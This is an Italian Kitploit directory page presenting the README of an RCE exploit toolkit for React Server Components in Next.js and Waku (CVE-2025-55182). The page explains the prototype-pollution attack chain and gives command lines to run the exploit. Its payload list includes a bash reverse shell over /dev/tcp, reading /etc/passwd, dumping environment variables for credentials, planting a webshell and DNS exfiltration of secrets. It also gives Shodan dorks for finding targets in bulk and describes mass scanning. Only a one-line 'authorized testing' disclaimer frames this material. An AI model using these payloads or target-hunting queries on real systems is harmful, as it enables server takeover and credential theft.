Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-RCE-CVE-2025-55182 — Toolkit avanzato di sfruttamento RCE per vulnerabilità dei React Server Components. Include molteplici payload preconfigurati, integrazione con Shodan per la scoperta dei target e scansione di massa per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlRed TeamingStrumento di Accesso Remoto

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sviluppo Payload
GitHubilixm/poc-rce-cve-2025-55182

PoC-RCE-CVE-2025-55182

Toolkit avanzato di sfruttamento RCE per vulnerabilità dei React Server Components. Include molteplici payload preconfigurati, integrazione con Shodan per la scoperta dei target e scansione di massa per test di penetrazione autorizzati.

Vedi Repository
149 mesi faNon ancora revisionato
Condividi

🔥 Toolkit di Exploit RSC RCE

Version License Node Platform

Toolkit avanzato per lo sfruttamento delle vulnerabilità di Esecuzione Remota di Codice nei React Server Components

Solo per test di penetrazione autorizzati e ricerca sulla sicurezza

Funzionalità • Installazione • Utilizzo • Integrazione Shodan • Esempi • Disclaimer


📋 Indice

  • Panoramica
  • Dettagli sulla Vulnerabilità
  • Funzionalità
  • Installazione
  • Avvio Rapido
  • Utilizzo
    • Exploit di Base
    • Payload Disponibili
    • Payload Personalizzati
  • Integrazione Shodan
  • Scansione Automatica
  • Esempi
  • Mitigazione
  • Versioni Interessate
  • Contributi
  • Disclaimer
  • Licenza

🎯 Panoramica

Questo toolkit sfrutta una vulnerabilità critica di Esecuzione Remota di Codice (RCE) nelle implementazioni dei React Server Components (RSC), prendendo di mira in particolare:

  • Next.js (versioni 13.4.0 - 14.1.0)
  • Waku (versioni vulnerabili)

La vulnerabilità sfrutta la prototype pollution e la deserializzazione non sicura nel meccanismo di gestione dei dati di RSC per ottenere l'esecuzione arbitraria di codice sul server.

🔴 Gravità: CRITICA

  • Punteggio CVSS: 9.8 (Critico)
  • Vettore di attacco: Rete
  • Privilegi richiesti: Nessuno
  • Interazione utente: Nessuna
  • Impatto: Compromissione totale del server

🔬 Dettagli sulla Vulnerabilità

Contesto Tecnico

I React Server Components utilizzano un formato di serializzazione personalizzato per trasferire dati tra client e server. La vulnerabilità risiede nel modo in cui questi framework deserializzano ed elaborano payload appositamente costruiti.

Catena di attacco:

  1. Costruzione del payload: creare un payload RSC dannoso con riferimenti circolari
  2. Prototype Pollution: abusare di $X:constructor:constructor per accedere al costruttore di Function
  3. Iniezione di codice: iniettare JavaScript arbitrario nel campo _prefix
  4. Esecuzione: il server deserializza ed esegue il payload

Flusso di sfruttamento

Attacker → Malicious RSC Payload → Target Server
                                         ↓
                              Unsafe Deserialization
                                         ↓
                              Prototype Chain Access
                                         ↓
                              Function Constructor
                                         ↓
                              ⚠️ RCE ACHIEVED ⚠️

✨ Funzionalità

Capacità Principali

  • ✅ Supporto di più framework: Next.js e Waku
  • ✅ 8 payload predefiniti: dal PoC alle reverse shell complete
  • ✅ Esecuzione di codice personalizzato: iniettare qualsiasi codice JavaScript
  • ✅ Integrazione Shodan: individuazione automatica dei target
  • ✅ Scansione di massa: test automatico di più target
  • ✅ CLI professionale: interfaccia a riga di comando completa
  • ✅ Registrazione dettagliata: output codificato a colori con timestamp
  • ✅ Gestione degli errori: gestione robusta degli errori

Payload Predefiniti

PayloadDescrizioneCaso d'uso
consolePoC di base (console.log)Verificare la vulnerabilità
reverseShellReverse shell BashAccesso iniziale
readFileLegge /etc/passwdAccesso al filesystem
envDumpScarica le variabili d'ambienteEstrazione di credenziali
execCommandEsegue comandi di sistemaEsecuzione arbitraria di comandi
webshellDistribuisce una webshell ExpressAccesso persistente
exfilPackageEsfiltra package.jsonAnalisi delle dipendenze
dnsExfilEsfiltrazione DNS (OOB)Sfruttamento cieco

📦 Installazione

Prerequisiti

  • Node.js >= 16.0.0
  • npm o yarn
  • CLI Shodan (opzionale, per la scansione automatica)

Clonare il Repository

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

Installare le Dipendenze

npm install
# or
yarn install

Configurare Shodan (Opzionale)

# Install Shodan CLI
pip install shodan

# Initialize with your API key
shodan init YOUR_API_KEY

🚀 Avvio Rapido

1. Verifica di Base della Vulnerabilità

node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. Ottenere una Reverse Shell

# Start listener
nc -lvnp 4444

# Execute exploit
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. Eseguire un Comando Personalizzato

node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 Utilizzo

Exploit di Base

node rsc-rce-exploit.js [options]

Opzioni

OpzioneDescrizioneObbligatoria
--target <url>URL del target✅
--framework <name>Framework: next o waku❌ (predefinito: next)
--payload <name>Nome del payload (vedi sotto)✅*
--custom <code>Codice JavaScript personalizzato✅*
--lhost <ip>Il tuo IP (per la reverse shell)❌
--lport <port>La tua porta (per la reverse shell)❌
--command <cmd>Comando da eseguire❌
--endpoint <path>Endpoint RSC personalizzato (Waku)❌
--action-id <id>ID next-action personalizzato❌
--listElenca i payload disponibili❌
--verboseOutput dettagliato❌
--helpMostra l'aiuto❌

*È richiesto uno tra --payload e --custom

Payload Disponibili

Visualizza tutti i payload:

node rsc-rce-exploit.js --list

Output:

📋 Available payloads:

  console              - Basic PoC - Console output
    Code: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Code: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Read /etc/passwd
    Code: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Dump environment variables
    Code: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Execute system command
    Code: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Write webshell to /tmp
    Code: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Read package.json
    Code: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - DNS exfiltration
    Code: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

Payload Personalizzati

Esegui qualsiasi codice JavaScript:

node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 Integrazione Shodan

Dork di Shodan

Target Next.js

# Basic Next.js
http.component:"Next.js"

# Next.js with RSC
http.html:"__next" http.html:"RSC"

# Next.js dev mode (more vulnerable)
http.html:"__NEXT_DATA__" http.html:"development"

# Self-hosted Next.js (not on Vercel)
http.component:"Next.js" -org:"Vercel"
Scarica lo strumento